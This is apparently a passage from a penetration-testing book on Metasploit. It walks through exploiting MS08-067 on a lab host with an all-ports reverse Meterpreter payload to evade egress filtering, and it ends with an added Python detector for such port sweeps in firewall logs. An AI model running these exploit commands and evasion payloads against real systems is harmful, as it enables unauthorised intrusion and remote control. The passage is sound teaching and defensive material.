
The Joy of Exploitation


This type of exploit, called a heap-based attack, takes advantage of dynamic 
memory allocation, but it isn't 100 percent reliable. (You may need to attempt 
the exploit command a few times if it doesn't work the first time.)

Notice in this example that we used a bind shell to set up a listener port 
on the target machine; Metasploit handles the direct connection to the system 
automatically for us. (Remember to use the reverse payload when attacking 
through a firewall or NAT.)

All-Ports Payloads: Brute Forcing Ports

In the preceding examples, we’ve relied on the reverse port always being 
open. But what if we’re attacking an organization with very strict egress port 
filtering? Most companies block outbound connections except those from a 
few defined ports, and it can be difficult to determine which ports can make 
outbound connections.

We can guess that port 443 won't be inspected and will allow a TCP connection 
out, and that FTP, Telnet, SSH, and HTTP may be allowed. But why guess when 
Metasploit has a very specific payload for use in finding open ports? 
Metasploit's payload will try every available port until it finds an open 
one. (Going through the entire port range [1–65535] can take quite a long 
time, however.)

Let's use this payload and have it try all ports connecting outbound until 
we get one that is successful:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.129
lhost => 192.168.33.129
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130
rhost => 192.168.33.130
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > search ports
[*] Searching loaded modules for pattern 'ports'...

Compatible Payloads
===================

   Name                                        Rank    Description
   ----                                        ----    -----------
   windows/dllinject/reverse_tcp_allports      normal  Reflective Dll Injection, Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_allports    normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
. . . SNIP . . .

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
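The port-by-port sweep described above leaves a distinctive footprint in egress firewall logs: one internal host, one external address, denied connections to rising port numbers, and possibly a single allowed connection at the end. The detection below is an added example, not code from the book; it assumes a hypothetical "time src dst dport action" log format and uses constructed sample lines.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log (hypothetical "time src dst dport action" format,
# not from any real product): one host sweeps ports at one external address.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.5.20 203.0.113.9 1 DENY
2024-05-01T10:00:00 10.0.5.20 203.0.113.9 2 DENY
2024-05-01T10:00:01 10.0.5.20 203.0.113.9 3 DENY
2024-05-01T10:00:01 10.0.5.20 203.0.113.9 4 DENY
2024-05-01T10:00:02 10.0.5.20 203.0.113.9 5 DENY
2024-05-01T10:00:02 10.0.5.20 203.0.113.9 6 DENY
2024-05-01T10:00:03 10.0.5.20 203.0.113.9 7 DENY
2024-05-01T10:00:03 10.0.5.20 203.0.113.9 8 DENY
2024-05-01T10:00:05 10.0.5.20 203.0.113.9 443 ALLOW
2024-05-01T10:00:06 10.0.5.21 198.51.100.7 443 ALLOW
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (DENY|ALLOW)$")
MIN_DENIED_PORTS = 8   # distinct denied ports before a pair is suspicious
WINDOW_SECONDS = 60    # the whole sweep must fit inside this window

def parse(log_text):
    """Yield (timestamp, src, dst, dport, action) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dst, port, action = m.groups()
            yield datetime.fromisoformat(ts), src, dst, int(port), action

def detect_allports_sweeps(log_text):
    """One alert per (src, dst) pair whose denied ports form a sweep."""
    by_pair = defaultdict(list)
    for ev in parse(log_text):
        by_pair[(ev[1], ev[2])].append(ev)
    alerts = []
    for (src, dst), evs in by_pair.items():
        evs.sort()
        denied = sorted({e[3] for e in evs if e[4] == "DENY"})
        span = (evs[-1][0] - evs[0][0]).total_seconds()
        if len(denied) < MIN_DENIED_PORTS or span > WINDOW_SECONDS:
            continue
        # Share of adjacent denied ports that are consecutive numbers: a stager
        # walking the whole range scores near 1.0, random noise scores low.
        steps = [b - a for a, b in zip(denied, denied[1:])]
        sequential = sum(s == 1 for s in steps) / len(steps)
        allowed = [e[3] for e in evs if e[4] == "ALLOW"]  # port that got out
        alerts.append({"src": src, "dst": dst, "denied_ports": len(denied),
                       "sequential_ratio": round(sequential, 2),
                       "egress_port": allowed[0] if allowed else None})
    return alerts
```

The reported egress_port is the one the blocking policy should be tightened around; the second host in the sample, which only made ordinary allowed connections, produces no alert.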